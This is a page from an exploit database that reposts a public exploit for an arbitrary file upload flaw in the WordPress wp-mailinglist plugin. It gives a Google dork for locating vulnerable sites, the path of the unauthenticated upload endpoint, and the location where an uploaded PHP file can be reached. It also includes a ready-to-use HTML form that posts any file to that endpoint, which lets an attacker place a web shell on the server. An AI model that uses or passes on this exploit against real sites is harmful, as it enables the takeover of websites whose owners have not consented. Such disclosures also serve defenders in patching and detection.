Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF

2017.05.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

################################################################################# # Exploit Title: Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF # Author : sohaip-hackerDZ # Google Dork : inurl:/wp-content/plugins/wp-mailinglist/ # Tested on : Linux # data : 2017-05-21 # Blog : http://www.tools-hack.com/ ################################################################################# # # # if msg : No file data was posted An existing vulnerability # # [!] Exploit : 127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php # # [!] File Location : http:/127.0.0.1/path/wp-content/uploads/wp-mailinglist/FILE_NAME.php ################################################################################# #CSRF: ################################################################################# <html> <body> <form action="127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" method="POST" enctype="multipart/form-data"> <input type="file" name="upfile" /> <input type="submit" value="Submit" /> </form> </body> </html> ################################################################################# # ABOUT # Facebook : https://www.facebook.com/sohaipbarika # forum : http://spyhackerz.com/forum/ # Blog : http://www.tools-hack.com/ #################################################################################


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top